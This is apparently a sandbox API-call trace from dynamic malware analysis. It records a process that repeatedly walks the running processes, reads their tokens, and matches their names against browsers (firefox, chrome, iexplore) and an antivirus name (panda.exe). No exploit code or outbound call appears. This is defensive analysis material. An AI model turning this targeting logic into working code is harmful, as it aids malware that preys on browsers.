[0146.117] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2e4) returned 0x0 [0146.117] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0x0 [0146.118] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0146.118] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x354) returned 0x0 [0146.118] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x368) returned 0x0 [0146.118] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x390) returned 0x0 [0146.118] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x274) returned 0x0 [0146.118] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x230) returned 0x0 [0146.118] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x41c) returned 0x0 [0146.118] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x550) returned 0x0 [0146.119] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x2f0 [0146.119] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0146.119] CloseHandle (hObject=0x2f0) returned 1 [0146.119] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x728) returned 0x2f0 [0146.119] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0146.119] CloseHandle (hObject=0x2f0) returned 1 [0146.119] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7cc) returned 0x2f0 [0146.119] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0146.119] CloseHandle (hObject=0x2f0) returned 1 [0146.119] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4b0) returned 0x2f0 [0146.120] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0146.120] CloseHandle (hObject=0x2f0) returned 1 [0146.120] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x910) returned 0x2f0 [0146.120] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0146.120] CloseHandle (hObject=0x2f0) returned 1 [0146.120] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa10) returned 0x2f0 [0146.120] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0146.120] CloseHandle (hObject=0x2f0) returned 1 [0146.120] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x590) returned 0x2f0 [0146.120] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0146.120] CloseHandle (hObject=0x2f0) returned 1 [0146.120] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb34) returned 0x0 [0146.121] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6ac) returned 0x0 [0146.121] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xba8) returned 0x2f0 [0146.121] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0146.121] CloseHandle (hObject=0x2f0) returned 1 [0146.121] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0 [0146.121] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0146.121] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc54) returned 0x2f0 [0146.121] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0146.121] CloseHandle (hObject=0x2f0) returned 1 [0146.121] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc54) returned 0x2f0 [0146.121] OpenProcessToken (in: ProcessHandle=0x2f0, DesiredAccess=0x8, TokenHandle=0x755fb28 | out: TokenHandle=0x755fb28*=0x2ec) returned 1 [0146.121] GetTokenInformation (in: TokenHandle=0x2ec, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x755fb14 | out: TokenInformation=0x0, ReturnLength=0x755fb14) returned 0 [0146.157] GetLastError () returned 0x7a [0146.158] GetTokenInformation (in: TokenHandle=0x2ec, TokenInformationClass=0x1, TokenInformation=0x54010a0, TokenInformationLength=0x24, ReturnLength=0x755fb14 | out: TokenInformation=0x54010a0, ReturnLength=0x755fb14) returned 1 [0146.158] GetTokenInformation (in: TokenHandle=0x2ec, TokenInformationClass=0xc, TokenInformation=0x755fb40, TokenInformationLength=0x4, ReturnLength=0x755fb2c | out: TokenInformation=0x755fb40, ReturnLength=0x755fb2c) returned 1 [0146.158] CloseHandle (hObject=0x2ec) returned 1 [0146.158] CloseHandle (hObject=0x2f0) returned 1 [0146.158] GetLengthSid (pSid=0x54010a8) returned 0x1c [0146.158] lstrcmpiW (lpString1="firefox.exe", lpString2="svchost.exe") returned -1 [0146.158] lstrcmpiW (lpString1="chrome.exe", lpString2="svchost.exe") returned -1 [0146.158] lstrcmpiW (lpString1="iexplore.exe", lpString2="svchost.exe") returned -1 [0146.158] lstrcmpiW (lpString1="panda.exe", lpString2="svchost.exe") returned -1 [0146.158] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdc0) returned 0x2f0 [0146.158] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0146.158] CloseHandle (hObject=0x2f0) returned 1 [0146.159] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x3e8) returned 0x102 [0147.204] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x755fb5c | out: SystemInformation=0x0, ResultLength=0x755fb5c*=0xf910) returned 0xc0000004 [0147.204] VirtualAlloc (lpAddress=0x0, dwSize=0x10910, flAllocationType=0x1000, flProtect=0x4) returned 0x7860000 [0147.204] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x7860000, Length=0x10910, ResultLength=0x0 | out: SystemInformation=0x7860000, ResultLength=0x0) returned 0x0 [0147.209] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0147.209] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0147.209] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x108) returned 0x0 [0147.209] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x150) returned 0x0 [0147.209] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0 [0147.210] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x194) returned 0x0 [0147.210] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1c4) returned 0x0 [0147.210] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0147.210] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e4) returned 0x0 [0147.210] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x23c) returned 0x0 [0147.210] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x25c) returned 0x0 [0147.210] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2e4) returned 0x0 [0147.210] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0x0 [0147.210] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0147.210] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x354) returned 0x0 [0147.210] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x368) returned 0x0 [0147.210] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x390) returned 0x0 [0147.211] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x274) returned 0x0 [0147.211] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x230) returned 0x0 [0147.211] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x41c) returned 0x0 [0147.211] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x550) returned 0x0 [0147.211] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x2f0 [0147.211] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0147.211] CloseHandle (hObject=0x2f0) returned 1 [0147.211] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x728) returned 0x2f0 [0147.211] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0147.212] CloseHandle (hObject=0x2f0) returned 1 [0147.212] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7cc) returned 0x2f0 [0147.212] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0147.212] CloseHandle (hObject=0x2f0) returned 1 [0147.212] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4b0) returned 0x2f0 [0147.212] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0147.212] CloseHandle (hObject=0x2f0) returned 1 [0147.212] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x910) returned 0x2f0 [0147.213] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0147.213] CloseHandle (hObject=0x2f0) returned 1 [0147.213] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa10) returned 0x2f0 [0147.213] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0147.213] CloseHandle (hObject=0x2f0) returned 1 [0147.213] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x590) returned 0x2f0 [0147.213] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0147.213] CloseHandle (hObject=0x2f0) returned 1 [0147.213] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb34) returned 0x0 [0147.214] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6ac) returned 0x0 [0147.214] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xba8) returned 0x2f0 [0147.214] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0147.214] CloseHandle (hObject=0x2f0) returned 1 [0147.214] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0 [0147.214] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0147.214] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc54) returned 0x2f0 [0147.214] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0147.215] CloseHandle (hObject=0x2f0) returned 1 [0147.215] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc54) returned 0x2f0 [0147.215] OpenProcessToken (in: ProcessHandle=0x2f0, DesiredAccess=0x8, TokenHandle=0x755fb28 | out: TokenHandle=0x755fb28*=0x2ec) returned 1 [0147.215] GetTokenInformation (in: TokenHandle=0x2ec, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x755fb14 | out: TokenInformation=0x0, ReturnLength=0x755fb14) returned 0 [0147.215] GetLastError () returned 0x7a [0147.215] GetTokenInformation (in: TokenHandle=0x2ec, TokenInformationClass=0x1, TokenInformation=0x54010a0, TokenInformationLength=0x24, ReturnLength=0x755fb14 | out: TokenInformation=0x54010a0, ReturnLength=0x755fb14) returned 1 [0147.215] GetTokenInformation (in: TokenHandle=0x2ec, TokenInformationClass=0xc, TokenInformation=0x755fb40, TokenInformationLength=0x4, ReturnLength=0x755fb2c | out: TokenInformation=0x755fb40, ReturnLength=0x755fb2c) returned 1 [0147.215] CloseHandle (hObject=0x2ec) returned 1 [0147.215] CloseHandle (hObject=0x2f0) returned 1 [0147.216] GetLengthSid (pSid=0x54010a8) returned 0x1c [0147.216] lstrcmpiW (lpString1="firefox.exe", lpString2="svchost.exe") returned -1 [0147.216] lstrcmpiW (lpString1="chrome.exe", lpString2="svchost.exe") returned -1 [0147.216] lstrcmpiW (lpString1="iexplore.exe", lpString2="svchost.exe") returned -1 [0147.216] lstrcmpiW (lpString1="panda.exe", lpString2="svchost.exe") returned -1 [0147.216] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdc0) returned 0x2f0 [0147.216] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0147.216] CloseHandle (hObject=0x2f0) returned 1 [0147.217] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x3e8) returned 0x102 [0148.211] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x755fb5c | out: SystemInformation=0x0, ResultLength=0x755fb5c*=0xf910) returned 0xc0000004 [0148.212] VirtualAlloc (lpAddress=0x0, dwSize=0x10910, flAllocationType=0x1000, flProtect=0x4) returned 0x7860000 [0148.212] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x7860000, Length=0x10910, ResultLength=0x0 | out: SystemInformation=0x7860000, ResultLength=0x0) returned 0x0 [0148.216] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0148.216] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0148.216] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x108) returned 0x0 [0148.216] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x150) returned 0x0 [0148.216] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0 [0148.216] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x194) returned 0x0 [0148.217] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1c4) returned 0x0 [0148.217] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0148.217] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e4) returned 0x0 [0148.217] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x23c) returned 0x0 [0148.217] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x25c) returned 0x0 [0148.217] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2e4) returned 0x0 [0148.217] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0x0 [0148.217] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0148.218] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x354) returned 0x0 [0148.218] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x368) returned 0x0 [0148.218] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x390) returned 0x0 [0148.218] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x274) returned 0x0 [0148.218] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x230) returned 0x0 [0148.219] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x41c) returned 0x0 [0148.219] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x550) returned 0x0 [0148.219] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x2f0 [0148.219] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0148.219] CloseHandle (hObject=0x2f0) returned 1 [0148.219] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x728) returned 0x2f0 [0148.219] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0148.219] CloseHandle (hObject=0x2f0) returned 1 [0148.220] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7cc) returned 0x2f0 [0148.220] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0148.220] CloseHandle (hObject=0x2f0) returned 1 [0148.220] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4b0) returned 0x2f0 [0148.220] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0148.220] CloseHandle (hObject=0x2f0) returned 1 [0148.220] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x910) returned 0x2f0 [0148.220] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0148.220] CloseHandle (hObject=0x2f0) returned 1 [0148.220] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa10) returned 0x2f0 [0148.221] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0148.221] CloseHandle (hObject=0x2f0) returned 1 [0148.221] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x590) returned 0x2f0 [0148.221] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0148.221] CloseHandle (hObject=0x2f0) returned 1 [0148.221] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb34) returned 0x0 [0148.221] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6ac) returned 0x0 [0148.221] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xba8) returned 0x2f0 [0148.221] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0148.222] CloseHandle (hObject=0x2f0) returned 1 [0148.222] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0 [0148.222] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0148.222] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc54) returned 0x2f0 [0148.222] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0148.222] CloseHandle (hObject=0x2f0) returned 1 [0148.222] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc54) returned 0x2f0 [0148.222] OpenProcessToken (in: ProcessHandle=0x2f0, DesiredAccess=0x8, TokenHandle=0x755fb28 | out: TokenHandle=0x755fb28*=0x2ec) returned 1 [0148.223] GetTokenInformation (in: TokenHandle=0x2ec, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x755fb14 | out: TokenInformation=0x0, ReturnLength=0x755fb14) returned 0 [0148.223] GetLastError () returned 0x7a [0148.223] GetTokenInformation (in: TokenHandle=0x2ec, TokenInformationClass=0x1, TokenInformation=0x54010a0, TokenInformationLength=0x24, ReturnLength=0x755fb14 | out: TokenInformation=0x54010a0, ReturnLength=0x755fb14) returned 1 [0148.223] GetTokenInformation (in: TokenHandle=0x2ec, TokenInformationClass=0xc, TokenInformation=0x755fb40, TokenInformationLength=0x4, ReturnLength=0x755fb2c | out: TokenInformation=0x755fb40, ReturnLength=0x755fb2c) returned 1 [0148.223] CloseHandle (hObject=0x2ec) returned 1 [0148.223] CloseHandle (hObject=0x2f0) returned 1 [0148.223] GetLengthSid (pSid=0x54010a8) returned 0x1c [0148.223] lstrcmpiW (lpString1="firefox.exe", lpString2="svchost.exe") returned -1 [0148.223] lstrcmpiW (lpString1="chrome.exe", lpString2="svchost.exe") returned -1 [0148.224] lstrcmpiW (lpString1="iexplore.exe", lpString2="svchost.exe") returned -1 [0148.224] lstrcmpiW (lpString1="panda.exe", lpString2="svchost.exe") returned -1 [0148.224] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdc0) returned 0x2f0 [0148.224] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0148.224] CloseHandle (hObject=0x2f0) returned 1 [0148.225] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x3e8) returned 0x102 [0149.234] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x755fb5c | out: SystemInformation=0x0, ResultLength=0x755fb5c*=0xf910) returned 0xc0000004 [0149.235] VirtualAlloc (lpAddress=0x0, dwSize=0x10910, flAllocationType=0x1000, flProtect=0x4) returned 0x7860000 [0149.235] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x7860000, Length=0x10910, ResultLength=0x0 | out: SystemInformation=0x7860000, ResultLength=0x0) returned 0x0 [0149.238] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0149.238] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0149.239] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x108) returned 0x0 [0149.239] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x150) returned 0x0 [0149.239] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0 [0149.239] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x194) returned 0x0 [0149.239] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1c4) returned 0x0 [0149.239] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0149.239] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e4) returned 0x0 [0149.239] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x23c) returned 0x0 [0149.239] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x25c) returned 0x0 [0149.240] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2e4) returned 0x0 [0149.240] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0x0 [0149.240] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0149.240] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x354) returned 0x0 [0149.240] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x368) returned 0x0 [0149.240] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x390) returned 0x0 [0149.240] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x274) returned 0x0 [0149.240] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x230) returned 0x0 [0149.240] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x41c) returned 0x0 [0149.241] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x550) returned 0x0 [0149.241] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x2f0 [0149.241] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0149.241] CloseHandle (hObject=0x2f0) returned 1 [0149.241] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x728) returned 0x2f0 [0149.241] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0149.241] CloseHandle (hObject=0x2f0) returned 1 [0149.241] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7cc) returned 0x2f0 [0149.241] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0149.241] CloseHandle (hObject=0x2f0) returned 1 [0149.242] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4b0) returned 0x2f0 [0149.242] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0149.242] CloseHandle (hObject=0x2f0) returned 1 [0149.242] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x910) returned 0x2f0 [0149.242] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0149.242] CloseHandle (hObject=0x2f0) returned 1 [0149.242] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa10) returned 0x2f0 [0149.242] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0149.242] CloseHandle (hObject=0x2f0) returned 1 [0149.243] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x590) returned 0x2f0 [0149.243] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0149.243] CloseHandle (hObject=0x2f0) returned 1 [0149.243] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb34) returned 0x0 [0149.243] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6ac) returned 0x0 [0149.243] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xba8) returned 0x2f0 [0149.243] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0149.243] CloseHandle (hObject=0x2f0) returned 1 [0149.244] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0 [0149.244] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0149.244] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc54) returned 0x2f0 [0149.244] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0149.244] CloseHandle (hObject=0x2f0) returned 1 [0149.244] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc54) returned 0x2f0 [0149.244] OpenProcessToken (in: ProcessHandle=0x2f0, DesiredAccess=0x8, TokenHandle=0x755fb28 | out: TokenHandle=0x755fb28*=0x2ec) returned 1 [0149.244] GetTokenInformation (in: TokenHandle=0x2ec, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x755fb14 | out: TokenInformation=0x0, ReturnLength=0x755fb14) returned 0 [0149.244] GetLastError () returned 0x7a [0149.245] GetTokenInformation (in: TokenHandle=0x2ec, TokenInformationClass=0x1, TokenInformation=0x54010a0, TokenInformationLength=0x24, ReturnLength=0x755fb14 | out: TokenInformation=0x54010a0, ReturnLength=0x755fb14) returned 1 [0149.245] GetTokenInformation (in: TokenHandle=0x2ec, TokenInformationClass=0xc, TokenInformation=0x755fb40, TokenInformationLength=0x4, ReturnLength=0x755fb2c | out: TokenInformation=0x755fb40, ReturnLength=0x755fb2c) returned 1 [0149.245] CloseHandle (hObject=0x2ec) returned 1 [0149.245] CloseHandle (hObject=0x2f0) returned 1 [0149.245] GetLengthSid (pSid=0x54010a8) returned 0x1c [0149.245] lstrcmpiW (lpString1="firefox.exe", lpString2="svchost.exe") returned -1 [0149.245] lstrcmpiW (lpString1="chrome.exe", lpString2="svchost.exe") returned -1 [0149.245] lstrcmpiW (lpString1="iexplore.exe", lpString2="svchost.exe") returned -1 [0149.245] lstrcmpiW (lpString1="panda.exe", lpString2="svchost.exe") returned -1 [0149.246] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdc0) returned 0x2f0 [0149.246] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0149.246] CloseHandle (hObject=0x2f0) returned 1 [0149.246] 